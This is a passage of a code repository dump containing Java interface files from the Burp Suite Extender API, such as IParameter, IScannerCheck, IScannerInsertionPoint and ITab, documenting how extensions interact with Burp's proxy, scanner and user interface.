41 |
42 | /**
43 | * The hosting editor will invoke this method before it displays a new HTTP
44 | * message, so that the custom tab can indicate whether it should be enabled
45 | * for that message.
46 | *
47 | * @param content The message that is about to be displayed, or a zero-length
48 | * array if the existing message is to be cleared.
49 | * @param isRequest Indicates whether the message is a request or a
50 | * response.
51 | * @return The method should return
52 | * true if the custom tab is able to handle the specified
53 | * message, and so will be displayed within the editor. Otherwise, the tab
54 | * will be hidden while this message is displayed.
55 | */
56 | boolean isEnabled(byte[] content, boolean isRequest);
57 |
58 | /**
59 | * The hosting editor will invoke this method to display a new message or to
60 | * clear the existing message. This method will only be called with a new
61 | * message if the tab has already returned
62 | * true to a call to
63 | * isEnabled() with the same message details.
64 | *
65 | * @param content The message that is to be displayed, or
66 | * null if the tab should clear its contents and disable any
67 | * editable controls.
68 | * @param isRequest Indicates whether the message is a request or a
69 | * response.
70 | */
71 | void setMessage(byte[] content, boolean isRequest);
72 |
73 | /**
74 | * This method returns the currently displayed message.
75 | *
76 | * @return The currently displayed message.
77 | */
78 | byte[] getMessage();
79 |
80 | /**
81 | * This method is used to determine whether the currently displayed message
82 | * has been modified by the user. The hosting editor will always call
83 | * getMessage() before calling this method, so any pending
84 | * edits should be completed within
85 | * getMessage().
86 | *
87 | * @return The method should return
88 | * true if the user has modified the current message since it
89 | * was first displayed.
90 | */
91 | boolean isModified();
92 |
93 | /**
94 | * This method is used to retrieve the data that is currently selected by
95 | * the user.
96 | *
97 | * @return The data that is currently selected by the user. This may be
98 | * null if no selection is currently made.
99 | */
100 | byte[] getSelectedData();
101 | }
102 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditorTabFactory.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IMessageEditorTabFactory.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerMessageEditorTabFactory() to
13 | * register a factory for custom message editor tabs. This allows extensions to
14 | * provide custom rendering or editing of HTTP messages, within Burp's own HTTP
15 | * editor.
16 | */
17 | public interface IMessageEditorTabFactory
18 | {
19 | /**
20 | * Burp will call this method once for each HTTP message editor, and the
21 | * factory should provide a new instance of an
22 | * burp.IMessageEditorTab object.
23 | *
24 | * @param controller An
25 | * burp.IMessageEditorController object, which the new tab can query
26 | * to retrieve details about the currently displayed message. This may be
27 | * null for extension-invoked message editors where the
28 | * extension has not provided an editor controller.
29 | * @param editable Indicates whether the hosting editor is editable or
30 | * read-only.
31 | * @return A new
32 | * burp.IMessageEditorTab object for use within the message editor.
33 | */
34 | IMessageEditorTab createNewInstance(IMessageEditorController controller,
35 | boolean editable);
36 | }
37 |
--------------------------------------------------------------------------------
/src/main/java/burp/IParameter.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IParameter.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to hold details about an HTTP request parameter.
12 | */
13 | public interface IParameter
14 | {
15 | /**
16 | * Used to indicate a parameter within the URL query string.
17 | */
18 | static final byte PARAM_URL = 0;
19 | /**
20 | * Used to indicate a parameter within the message body.
21 | */
22 | static final byte PARAM_BODY = 1;
23 | /**
24 | * Used to indicate an HTTP cookie.
25 | */
26 | static final byte PARAM_COOKIE = 2;
27 | /**
28 | * Used to indicate an item of data within an XML structure.
29 | */
30 | static final byte PARAM_XML = 3;
31 | /**
32 | * Used to indicate the value of a tag attribute within an XML structure.
33 | */
34 | static final byte PARAM_XML_ATTR = 4;
35 | /**
36 | * Used to indicate the value of a parameter attribute within a multi-part
37 | * message body (such as the name of an uploaded file).
38 | */
39 | static final byte PARAM_MULTIPART_ATTR = 5;
40 | /**
41 | * Used to indicate an item of data within a JSON structure.
42 | */
43 | static final byte PARAM_JSON = 6;
44 |
45 | /**
46 | * This method is used to retrieve the parameter type.
47 | *
48 | * @return The parameter type. The available types are defined within this
49 | * interface.
50 | */
51 | byte getType();
52 |
53 | /**
54 | * This method is used to retrieve the parameter name.
55 | *
56 | * @return The parameter name.
57 | */
58 | String getName();
59 |
60 | /**
61 | * This method is used to retrieve the parameter value.
62 | *
63 | * @return The parameter value.
64 | */
65 | String getValue();
66 |
67 | /**
68 | * This method is used to retrieve the start offset of the parameter name
69 | * within the HTTP request.
70 | *
71 | * @return The start offset of the parameter name within the HTTP request,
72 | * or -1 if the parameter is not associated with a specific request.
73 | */
74 | int getNameStart();
75 |
76 | /**
77 | * This method is used to retrieve the end offset of the parameter name
78 | * within the HTTP request.
79 | *
80 | * @return The end offset of the parameter name within the HTTP request, or
81 | * -1 if the parameter is not associated with a specific request.
82 | */
83 | int getNameEnd();
84 |
85 | /**
86 | * This method is used to retrieve the start offset of the parameter value
87 | * within the HTTP request.
88 | *
89 | * @return The start offset of the parameter value within the HTTP request,
90 | * or -1 if the parameter is not associated with a specific request.
91 | */
92 | int getValueStart();
93 |
94 | /**
95 | * This method is used to retrieve the end offset of the parameter value
96 | * within the HTTP request.
97 | *
98 | * @return The end offset of the parameter value within the HTTP request, or
99 | * -1 if the parameter is not associated with a specific request.
100 | */
101 | int getValueEnd();
102 | }
103 |
--------------------------------------------------------------------------------
/src/main/java/burp/IProxyListener.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IProxyListener.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerProxyListener() to register a
13 | * Proxy listener. The listener will be notified of requests and responses being
14 | * processed by the Proxy tool. Extensions can perform custom analysis or
15 | * modification of these messages, and control in-UI message interception, by
16 | * registering a proxy listener.
17 | */
18 | public interface IProxyListener
19 | {
20 | /**
21 | * This method is invoked when an HTTP message is being processed by the
22 | * Proxy.
23 | *
24 | * @param messageIsRequest Indicates whether the HTTP message is a request
25 | * or a response.
26 | * @param message An
27 | * burp.IInterceptedProxyMessage object that extensions can use to
28 | * query and update details of the message, and control whether the message
29 | * should be intercepted and displayed to the user for manual review or
30 | * modification.
31 | */
32 | void processProxyMessage(
33 | boolean messageIsRequest,
34 | IInterceptedProxyMessage message);
35 | }
36 |
--------------------------------------------------------------------------------
/src/main/java/burp/IRequestInfo.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IRequestInfo.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.net.URL;
11 | import java.util.List;
12 |
13 | /**
14 | * This interface is used to retrieve key details about an HTTP request.
15 | * Extensions can obtain an
16 | * burp.IRequestInfo object for a given request by calling
17 | * burp.IExtensionHelpers.analyzeRequest().
18 | */
19 | public interface IRequestInfo
20 | {
21 | /**
22 | * Used to indicate that there is no content.
23 | */
24 | static final byte CONTENT_TYPE_NONE = 0;
25 | /**
26 | * Used to indicate URL-encoded content.
27 | */
28 | static final byte CONTENT_TYPE_URL_ENCODED = 1;
29 | /**
30 | * Used to indicate multi-part content.
31 | */
32 | static final byte CONTENT_TYPE_MULTIPART = 2;
33 | /**
34 | * Used to indicate XML content.
35 | */
36 | static final byte CONTENT_TYPE_XML = 3;
37 | /**
38 | * Used to indicate JSON content.
39 | */
40 | static final byte CONTENT_TYPE_JSON = 4;
41 | /**
42 | * Used to indicate AMF content.
43 | */
44 | static final byte CONTENT_TYPE_AMF = 5;
45 | /**
46 | * Used to indicate unknown content.
47 | */
48 | static final byte CONTENT_TYPE_UNKNOWN = -1;
49 |
50 | /**
51 | * This method is used to obtain the HTTP method used in the request.
52 | *
53 | * @return The HTTP method used in the request.
54 | */
55 | String getMethod();
56 |
57 | /**
58 | * This method is used to obtain the URL in the request.
59 | *
60 | * @return The URL in the request.
61 | */
62 | URL getUrl();
63 |
64 | /**
65 | * This method is used to obtain the HTTP headers contained in the request.
66 | *
67 | * @return The HTTP headers contained in the request.
68 | */
69 | List getHeaders();
70 |
71 | /**
72 | * This method is used to obtain the parameters contained in the request.
73 | *
74 | * @return The parameters contained in the request.
75 | */
76 | List getParameters();
77 |
78 | /**
79 | * This method is used to obtain the offset within the request where the
80 | * message body begins.
81 | *
82 | * @return The offset within the request where the message body begins.
83 | */
84 | int getBodyOffset();
85 |
86 | /**
87 | * This method is used to obtain the content type of the message body.
88 | *
89 | * @return An indication of the content type of the message body. Available
90 | * types are defined within this interface.
91 | */
92 | byte getContentType();
93 | }
94 |
--------------------------------------------------------------------------------
/src/main/java/burp/IResponseInfo.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IResponseInfo.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.util.List;
11 |
12 | /**
13 | * This interface is used to retrieve key details about an HTTP response.
14 | * Extensions can obtain an
15 | * burp.IResponseInfo object for a given response by calling
16 | * burp.IExtensionHelpers.analyzeResponse().
17 | */
18 | public interface IResponseInfo
19 | {
20 | /**
21 | * This method is used to obtain the HTTP headers contained in the response.
22 | *
23 | * @return The HTTP headers contained in the response.
24 | */
25 | List getHeaders();
26 |
27 | /**
28 | * This method is used to obtain the offset within the response where the
29 | * message body begins.
30 | *
31 | * @return The offset within the response where the message body begins.
32 | */
33 | int getBodyOffset();
34 |
35 | /**
36 | * This method is used to obtain the HTTP status code contained in the
37 | * response.
38 | *
39 | * @return The HTTP status code contained in the response.
40 | */
41 | short getStatusCode();
42 |
43 | /**
44 | * This method is used to obtain details of the HTTP cookies set in the
45 | * response.
46 | *
47 | * @return A list of burp.ICookie objects representing the cookies
48 | * set in the response, if any.
49 | */
50 | List getCookies();
51 |
52 | /**
53 | * This method is used to obtain the MIME type of the response, as stated in
54 | * the HTTP headers.
55 | *
56 | * @return A textual label for the stated MIME type, or an empty String if
57 | * this is not known or recognized. The possible labels are the same as
58 | * those used in the main Burp UI.
59 | */
60 | String getStatedMimeType();
61 |
62 | /**
63 | * This method is used to obtain the MIME type of the response, as inferred
64 | * from the contents of the HTTP message body.
65 | *
66 | * @return A textual label for the inferred MIME type, or an empty String if
67 | * this is not known or recognized. The possible labels are the same as
68 | * those used in the main Burp UI.
69 | */
70 | String getInferredMimeType();
71 | }
72 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScanIssue.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScanIssue.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to retrieve details of Scanner issues. Extensions can
12 | * obtain details of issues by registering an
13 | * burp.IScannerListener or by calling
14 | * burp.IBurpExtenderCallbacks.getScanIssues(). Extensions can also add
15 | * custom Scanner issues by registering an
16 | * burp.IScannerCheck or calling
17 | * burp.IBurpExtenderCallbacks.addScanIssue(), and providing their own
18 | * implementations of this interface
19 | */
20 | public interface IScanIssue
21 | {
22 | /**
23 | * This method returns the URL for which the issue was generated.
24 | *
25 | * @return The URL for which the issue was generated.
26 | */
27 | java.net.URL getUrl();
28 |
29 | /**
30 | * This method returns the name of the issue type.
31 | *
32 | * @return The name of the issue type (e.g. "SQL injection").
33 | */
34 | String getIssueName();
35 |
36 | /**
37 | * This method returns a numeric identifier of the issue type. See the Burp
38 | * Scanner help documentation for a listing of all the issue types.
39 | *
40 | * @return A numeric identifier of the issue type.
41 | */
42 | int getIssueType();
43 |
44 | /**
45 | * This method returns the issue severity level.
46 | *
47 | * @return The issue severity level. Expected values are "High", "Medium",
48 | * "Low", "Information" or "False positive".
49 | *
50 | */
51 | String getSeverity();
52 |
53 | /**
54 | * This method returns the issue confidence level.
55 | *
56 | * @return The issue confidence level. Expected values are "Certain", "Firm"
57 | * or "Tentative".
58 | */
59 | String getConfidence();
60 |
61 | /**
62 | * This method returns a background description for this type of issue.
63 | *
64 | * @return A background description for this type of issue, or
65 | * null if none applies.
66 | */
67 | String getIssueBackground();
68 |
69 | /**
70 | * This method returns a background description of the remediation for this
71 | * type of issue.
72 | *
73 | * @return A background description of the remediation for this type of
74 | * issue, or
75 | * null if none applies.
76 | */
77 | String getRemediationBackground();
78 |
79 | /**
80 | * This method returns detailed information about this specific instance of
81 | * the issue.
82 | *
83 | * @return Detailed information about this specific instance of the issue,
84 | * or
85 | * null if none applies.
86 | */
87 | String getIssueDetail();
88 |
89 | /**
90 | * This method returns detailed information about the remediation for this
91 | * specific instance of the issue.
92 | *
93 | * @return Detailed information about the remediation for this specific
94 | * instance of the issue, or
95 | * null if none applies.
96 | */
97 | String getRemediationDetail();
98 |
99 | /**
100 | * This method returns the HTTP messages on the basis of which the issue was
101 | * generated.
102 | *
103 | * @return The HTTP messages on the basis of which the issue was generated.
104 | * Note: The items in this array should be instances of
105 | * burp.IHttpRequestResponseWithMarkers if applicable, so that
106 | * details of the relevant portions of the request and response messages are
107 | * available.
108 | */
109 | IHttpRequestResponse[] getHttpMessages();
110 |
111 | /**
112 | * This method returns the HTTP service for which the issue was generated.
113 | *
114 | * @return The HTTP service for which the issue was generated.
115 | */
116 | IHttpService getHttpService();
117 |
118 | }
119 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScanQueueItem.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScanQueueItem.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to retrieve details of items in the Burp Scanner
12 | * active scan queue. Extensions can obtain references to scan queue items by
13 | * calling
14 | * burp.IBurpExtenderCallbacks.doActiveScan().
15 | */
16 | public interface IScanQueueItem
17 | {
18 | /**
19 | * This method returns a description of the status of the scan queue item.
20 | *
21 | * @return A description of the status of the scan queue item.
22 | */
23 | String getStatus();
24 |
25 | /**
26 | * This method returns an indication of the percentage completed for the
27 | * scan queue item.
28 | *
29 | * @return An indication of the percentage completed for the scan queue
30 | * item.
31 | */
32 | byte getPercentageComplete();
33 |
34 | /**
35 | * This method returns the number of requests that have been made for the
36 | * scan queue item.
37 | *
38 | * @return The number of requests that have been made for the scan queue
39 | * item.
40 | */
41 | int getNumRequests();
42 |
43 | /**
44 | * This method returns the number of network errors that have occurred for
45 | * the scan queue item.
46 | *
47 | * @return The number of network errors that have occurred for the scan
48 | * queue item.
49 | */
50 | int getNumErrors();
51 |
52 | /**
53 | * This method returns the number of attack insertion points being used for
54 | * the scan queue item.
55 | *
56 | * @return The number of attack insertion points being used for the scan
57 | * queue item.
58 | */
59 | int getNumInsertionPoints();
60 |
61 | /**
62 | * This method allows the scan queue item to be canceled.
63 | */
64 | void cancel();
65 |
66 | /**
67 | * This method returns details of the issues generated for the scan queue
68 | * item. Note: different items within the scan queue may contain
69 | * duplicated versions of the same issues - for example, if the same request
70 | * has been scanned multiple times. Duplicated issues are consolidated in
71 | * the main view of scan results. Extensions can register an
72 | * burp.IScannerListener to get details only of unique, newly
73 | * discovered Scanner issues post-consolidation.
74 | *
75 | * @return Details of the issues generated for the scan queue item.
76 | */
77 | IScanIssue[] getIssues();
78 | }
79 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerCheck.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScannerCheck.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.util.List;
11 |
12 | /**
13 | * Extensions can implement this interface and then call
14 | * burp.IBurpExtenderCallbacks.registerScannerCheck() to register a
15 | * custom Scanner check. When performing scanning, Burp will ask the check to
16 | * perform active or passive scanning on the base request, and report any
17 | * Scanner issues that are identified.
18 | */
19 | public interface IScannerCheck
20 | {
21 |
22 | /**
23 | * The Scanner invokes this method for each base request / response that is
24 | * passively scanned. Note: Extensions should only analyze the
25 | * HTTP messages provided during passive scanning, and should not make any
26 | * new HTTP requests of their own.
27 | *
28 | * @param baseRequestResponse The base HTTP request / response that should
29 | * be passively scanned.
30 | * @return A list of burp.IScanIssue objects, or null
31 | * if no issues are identified.
32 | */
33 | List doPassiveScan(IHttpRequestResponse baseRequestResponse);
34 |
35 | /**
36 | * The Scanner invokes this method for each insertion point that is actively
37 | * scanned. Extensions may issue HTTP requests as required to carry out
38 | * active scanning, and should use the
39 | * burp.IScannerInsertionPoint object provided to build scan
40 | * requests for particular payloads.
41 | * Note:
42 | * Scan checks should submit raw non-encoded payloads to insertion points,
43 | * and the insertion point has responsibility for performing any data
44 | * encoding that is necessary given the nature and location of the insertion
45 | * point.
46 | *
47 | * @param baseRequestResponse The base HTTP request / response that should
48 | * be actively scanned.
49 | * @param insertionPoint An burp.IScannerInsertionPoint object that
50 | * can be queried to obtain details of the insertion point being tested, and
51 | * can be used to build scan requests for particular payloads.
52 | * @return A list of burp.IScanIssue objects, or null
53 | * if no issues are identified.
54 | */
55 | List doActiveScan(
56 | IHttpRequestResponse baseRequestResponse,
57 | IScannerInsertionPoint insertionPoint);
58 |
59 | /**
60 | * The Scanner invokes this method when the custom Scanner check has
61 | * reported multiple issues for the same URL path. This can arise either
62 | * because there are multiple distinct vulnerabilities, or because the same
63 | * (or a similar) request has been scanned more than once. The custom check
64 | * should determine whether the issues are duplicates. In most cases, where
65 | * a check uses distinct issue names or descriptions for distinct issues,
66 | * the consolidation process will simply be a matter of comparing these
67 | * features for the two issues.
68 | *
69 | * @param existingIssue An issue that was previously reported by this
70 | * Scanner check.
71 | * @param newIssue An issue at the same URL path that has been newly
72 | * reported by this Scanner check.
73 | * @return An indication of which issue(s) should be reported in the main
74 | * Scanner results. The method should return -1 to report the
75 | * existing issue only, 0 to report both issues, and
76 | * 1 to report the new issue only.
77 | */
78 | int consolidateDuplicateIssues(
79 | IScanIssue existingIssue,
80 | IScanIssue newIssue);
81 | }
82 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerInsertionPoint.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScannerInsertionPoint.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to define an insertion point for use by active Scanner
12 | * checks. Extensions can obtain instances of this interface by registering an
13 | * burp.IScannerCheck, or can create instances for use by Burp's own
14 | * scan checks by registering an
15 | * burp.IScannerInsertionPointProvider.
16 | */
17 | public interface IScannerInsertionPoint
18 | {
19 |
20 | /**
21 | * Used to indicate where the payload is inserted into the value of a URL
22 | * parameter.
23 | */
24 | static final byte INS_PARAM_URL = 0x00;
25 | /**
26 | * Used to indicate where the payload is inserted into the value of a body
27 | * parameter.
28 | */
29 | static final byte INS_PARAM_BODY = 0x01;
30 | /**
31 | * Used to indicate where the payload is inserted into the value of an HTTP
32 | * cookie.
33 | */
34 | static final byte INS_PARAM_COOKIE = 0x02;
35 | /**
36 | * Used to indicate where the payload is inserted into the value of an item
37 | * of data within an XML data structure.
38 | */
39 | static final byte INS_PARAM_XML = 0x03;
40 | /**
41 | * Used to indicate where the payload is inserted into the value of a tag
42 | * attribute within an XML structure.
43 | */
44 | static final byte INS_PARAM_XML_ATTR = 0x04;
45 | /**
46 | * Used to indicate where the payload is inserted into the value of a
47 | * parameter attribute within a multi-part message body (such as the name of
48 | * an uploaded file).
49 | */
50 | static final byte INS_PARAM_MULTIPART_ATTR = 0x05;
51 | /**
52 | * Used to indicate where the payload is inserted into the value of an item
53 | * of data within a JSON structure.
54 | */
55 | static final byte INS_PARAM_JSON = 0x06;
56 | /**
57 | * Used to indicate where the payload is inserted into the value of an AMF
58 | * parameter.
59 | */
60 | static final byte INS_PARAM_AMF = 0x07;
61 | /**
62 | * Used to indicate where the payload is inserted into the value of an HTTP
63 | * request header.
64 | */
65 | static final byte INS_HEADER = 0x20;
66 | /**
67 | * Used to indicate where the payload is inserted into a URL path folder.
68 | */
69 | static final byte INS_URL_PATH_FOLDER = 0x21;
70 | /**
71 | * Used to indicate where the payload is inserted into a URL path folder.
72 | * This is now deprecated; use INS_URL_PATH_FOLDER instead.
73 | */
74 | @Deprecated
75 | static final byte INS_URL_PATH_REST = INS_URL_PATH_FOLDER;
76 | /**
77 | * Used to indicate where the payload is inserted into the name of an added
78 | * URL parameter.
79 | */
80 | static final byte INS_PARAM_NAME_URL = 0x22;
81 | /**
82 | * Used to indicate where the payload is inserted into the name of an added
83 | * body parameter.
84 | */
85 | static final byte INS_PARAM_NAME_BODY = 0x23;
86 | /**
87 | * Used to indicate where the payload is inserted into the body of the HTTP
88 | * request.
89 | */
90 | static final byte INS_ENTIRE_BODY = 0x24;
91 | /**
92 | * Used to indicate where the payload is inserted into the URL path
93 | * filename.
94 | */
95 | static final byte INS_URL_PATH_FILENAME = 0x25;
96 | /**
97 | * Used to indicate where the payload is inserted at a location manually
98 | * configured by the user.
99 | */
100 | static final byte INS_USER_PROVIDED = 0x40;
101 | /**
102 | * Used to indicate where the insertion point is provided by an
103 | * extension-registered
104 | * burp.IScannerInsertionPointProvider.
105 | */
106 | static final byte INS_EXTENSION_PROVIDED = 0x41;
107 | /**
108 | * Used to indicate where the payload is inserted at an unknown location
109 | * within the request.
110 | */
111 | static final byte INS_UNKNOWN = 0x7f;
112 |
113 | /**
114 | * This method returns the name of the insertion point.
115 | *
116 | * @return The name of the insertion point (for example, a description of a
117 | * particular request parameter).
118 | */
119 | String getInsertionPointName();
120 |
121 | /**
122 | * This method returns the base value for this insertion point.
123 | *
124 | * @return the base value that appears in this insertion point in the base
125 | * request being scanned, or null if there is no value in the
126 | * base request that corresponds to this insertion point.
127 | */
128 | String getBaseValue();
129 |
130 | /**
131 | * This method is used to build a request with the specified payload placed
132 | * into the insertion point. There is no requirement for extension-provided
133 | * insertion points to adjust the Content-Length header in requests if the
134 | * body length has changed, although Burp-provided insertion points will
135 | * always do this and will return a request with a valid Content-Length
136 | * header.
137 | * Note:
138 | * Scan checks should submit raw non-encoded payloads to insertion points,
139 | * and the insertion point has responsibility for performing any data
140 | * encoding that is necessary given the nature and location of the insertion
141 | * point.
142 | *
143 | * @param payload The payload that should be placed into the insertion
144 | * point.
145 | * @return The resulting request.
146 | */
147 | byte[] buildRequest(byte[] payload);
148 |
149 | /**
150 | * This method is used to determine the offsets of the payload value within
151 | * the request, when it is placed into the insertion point. Scan checks may
152 | * invoke this method when reporting issues, so as to highlight the relevant
153 | * part of the request within the UI.
154 | *
155 | * @param payload The payload that should be placed into the insertion
156 | * point.
157 | * @return An int[2] array containing the start and end offsets of the
158 | * payload within the request, or null if this is not applicable (for
159 | * example, where the insertion point places a payload into a serialized
160 | * data structure, the raw payload may not literally appear anywhere within
161 | * the resulting request).
162 | */
163 | int[] getPayloadOffsets(byte[] payload);
164 |
165 | /**
166 | * This method returns the type of the insertion point.
167 | *
168 | * @return The type of the insertion point. Available types are defined in
169 | * this interface.
170 | */
171 | byte getInsertionPointType();
172 | }
173 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerInsertionPointProvider.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScannerInsertionPointProvider.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.util.List;
11 |
12 | /**
13 | * Extensions can implement this interface and then call
14 | * burp.IBurpExtenderCallbacks.registerScannerInsertionPointProvider()
15 | * to register a factory for custom Scanner insertion points.
16 | */
17 | public interface IScannerInsertionPointProvider
18 | {
19 | /**
20 | * When a request is actively scanned, the Scanner will invoke this method,
21 | * and the provider should provide a list of custom insertion points that
22 | * will be used in the scan. Note: these insertion points are used in
23 | * addition to those that are derived from Burp Scanner's configuration, and
24 | * those provided by any other Burp extensions.
25 | *
26 | * @param baseRequestResponse The base request that will be actively
27 | * scanned.
28 | * @return A list of
29 | * burp.IScannerInsertionPoint objects that should be used in the
30 | * scanning, or
31 | * null if no custom insertion points are applicable for this
32 | * request.
33 | */
34 | List getInsertionPoints(
35 | IHttpRequestResponse baseRequestResponse);
36 | }
37 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerListener.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScannerListener.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerScannerListener() to register a
13 | * Scanner listener. The listener will be notified of new issues that are
14 | * reported by the Scanner tool. Extensions can perform custom analysis or
15 | * logging of Scanner issues by registering a Scanner listener.
16 | */
17 | public interface IScannerListener
18 | {
19 | /**
20 | * This method is invoked when a new issue is added to Burp Scanner's
21 | * results.
22 | *
23 | * @param issue An
24 | * burp.IScanIssue object that the extension can query to obtain
25 | * details about the new issue.
26 | */
27 | void newScanIssue(IScanIssue issue);
28 | }
29 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScopeChangeListener.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IScopeChangeListener.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerScopeChangeListener() to register
13 | * a scope change listener. The listener will be notified whenever a change
14 | * occurs to Burp's suite-wide target scope.
15 | */
16 | public interface IScopeChangeListener
17 | {
18 | /**
19 | * This method is invoked whenever a change occurs to Burp's suite-wide
20 | * target scope.
21 | */
22 | void scopeChanged();
23 | }
24 |
--------------------------------------------------------------------------------
/src/main/java/burp/ISessionHandlingAction.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.ISessionHandlingAction.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerSessionHandlingAction() to
13 | * register a custom session handling action. Each registered action will be
14 | * available within the session handling rule UI for the user to select as a
15 | * rule action. Users can choose to invoke an action directly in its own right,
16 | * or following execution of a macro.
17 | */
18 | public interface ISessionHandlingAction
19 | {
20 | /**
21 | * This method is used by Burp to obtain the name of the session handling
22 | * action. This will be displayed as an option within the session handling
23 | * rule editor when the user selects to execute an extension-provided
24 | * action.
25 | *
26 | * @return The name of the action.
27 | */
28 | String getActionName();
29 |
30 | /**
31 | * This method is invoked when the session handling action should be
32 | * executed. This may happen as an action in its own right, or as a
33 | * sub-action following execution of a macro.
34 | *
35 | * @param currentRequest The base request that is currently being processed.
36 | * The action can query this object to obtain details about the base
37 | * request. It can issue additional requests of its own if necessary, and
38 | * can use the setter methods on this object to update the base request.
39 | * @param macroItems If the action is invoked following execution of a
40 | * macro, this parameter contains the result of executing the macro.
41 | * Otherwise, it is
42 | * null. Actions can use the details of the macro items to
43 | * perform custom analysis of the macro to derive values of non-standard
44 | * session handling tokens, etc.
45 | */
46 | void performAction(
47 | IHttpRequestResponse currentRequest,
48 | IHttpRequestResponse[] macroItems);
49 | }
50 |
--------------------------------------------------------------------------------
/src/main/java/burp/ITab.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.ITab.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.awt.Component;
11 |
12 | /**
13 | * This interface is used to provide Burp with details of a custom tab that will
14 | * be added to Burp's UI, using a method such as
15 | * burp.IBurpExtenderCallbacks.addSuiteTab().
16 | */
17 | public interface ITab
18 | {
19 | /**
20 | * Burp uses this method to obtain the caption that should appear on the
21 | * custom tab when it is displayed.
22 | *
23 | * @return The caption that should appear on the custom tab when it is
24 | * displayed.
25 | */
26 | String getTabCaption();
27 |
28 | /**
29 | * Burp uses this method to obtain the component that should be used as the
30 | * contents of the custom tab when it is displayed.
31 | *
32 | * @return The component that should be used as the contents of the custom
33 | * tab when it is displayed.
34 | */
35 | Component getUiComponent();
36 | }
37 |
--------------------------------------------------------------------------------
/src/main/java/burp/ITempFile.java:
--------------------------------------------------------------------------------
1 | package burp;/*
